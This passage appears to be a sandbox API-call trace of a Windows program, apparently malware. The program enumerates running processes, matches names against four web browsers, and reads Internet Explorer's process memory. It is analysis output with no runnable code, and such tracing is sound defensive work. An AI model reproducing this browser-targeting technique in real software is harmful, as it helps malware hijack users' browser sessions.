	[0218.761] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0218.761] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.761] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0218.762] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.762] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0218.762] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.762] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0218.762] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0218.763] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x4afc
	[0218.763] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.763] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0218.763] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.763] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0218.763] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.764] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0218.764] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.764] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0218.764] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0218.765] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x4b00
	[0218.765] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.765] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0218.766] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.766] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0218.766] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.766] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0218.766] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.766] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0218.767] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0218.767] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x4b04
	[0218.767] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.767] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0218.768] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.768] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0218.768] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.768] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0218.769] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.769] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0218.769] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0218.770] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x4b08
	[0218.770] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.770] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0218.770] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.770] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0218.771] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.771] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0218.771] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.771] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0218.771] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0218.772] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x4b0c
	[0218.772] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.772] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0218.772] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.772] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0218.773] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.773] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0218.773] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.773] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0218.773] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0218.774] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x4b10
	[0218.774] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.774] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0218.775] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.775] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0218.775] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.775] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0218.776] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.776] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0218.776] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0218.777] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x4b14
	[0218.777] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.777] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0218.777] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.777] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0218.777] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.777] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0218.778] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.778] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0218.778] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0218.778] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x4b18
	[0218.778] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.779] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0218.779] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.779] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0218.779] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.779] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0218.779] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.779] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0218.779] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0218.780] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x4b1c
	[0218.780] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.780] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0218.781] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.781] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0218.781] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.781] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0218.782] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.782] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0218.782] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0218.783] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x4b20
	[0218.783] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.783] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0218.783] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.783] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0218.784] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.784] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0218.784] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.784] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0218.785] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0218.786] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x4b24
	[0218.786] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.786] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0218.786] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.786] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0218.787] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.787] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0218.787] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.787] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0218.787] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0218.788] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x4b28
	[0218.788] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.788] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0218.789] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.789] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0218.789] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.789] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0218.790] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.790] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0218.791] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0218.792] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x4b2c
	[0218.792] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.792] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0218.793] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.793] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0218.793] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.793] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0218.794] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.794] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0218.794] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0218.795] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x4b30
	[0218.795] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.795] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0218.795] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.795] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0218.796] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.796] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0218.796] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.796] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0218.796] NtQueryInformationProcess (in: ProcessHandle=0x4b30, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0218.796] ReadProcessMemory (in: hProcess=0x4b30, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0218.796] ReadProcessMemory (in: hProcess=0x4b30, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0218.796] ReadProcessMemory (in: hProcess=0x4b30, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0218.796] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0218.797] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0218.797] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x4b34
	[0218.797] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.797] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0218.798] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.798] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0218.798] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.798] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0218.798] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.798] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0218.799] NtQueryInformationProcess (in: ProcessHandle=0x4b34, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0218.799] ReadProcessMemory (in: hProcess=0x4b34, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0218.799] ReadProcessMemory (in: hProcess=0x4b34, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0218.799] ReadProcessMemory (in: hProcess=0x4b34, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0218.799] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0218.799] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0218.800] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x4b38
	[0218.800] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.800] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0218.800] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.800] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0218.800] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.801] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0218.801] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.801] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0218.801] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0218.802] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x4b3c
	[0218.802] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.802] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0218.802] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.802] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0218.802] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.803] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0218.803] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.803] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0218.803] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0218.804] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x4b40
	[0218.804] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.804] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0218.804] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.804] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0218.804] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.804] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0218.805] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.805] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0218.805] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0218.806] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0218.807] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x4b44
	[0218.807] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.807] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0218.807] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.807] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0218.807] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.807] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0218.808] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.808] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0218.808] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1
	[0218.809] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x468) returned 0x4b48
	[0218.809] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.809] StrStrIA (lpFirst="dllhost.exe", lpSrch="chrome.exe") returned 0x0
	[0218.809] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.809] StrStrIA (lpFirst="dllhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0218.809] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.809] StrStrIA (lpFirst="dllhost.exe", lpSrch="firefox.exe") returned 0x0
	[0218.810] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.810] StrStrIA (lpFirst="dllhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0218.810] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0218.811] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0x4b4c
	[0218.811] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.811] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0218.811] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.811] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0218.811] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.811] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0218.812] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.812] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0218.812] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0218.813] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0x4b50
	[0218.813] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.813] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0218.813] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.813] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0218.813] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.813] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0218.814] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.814] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
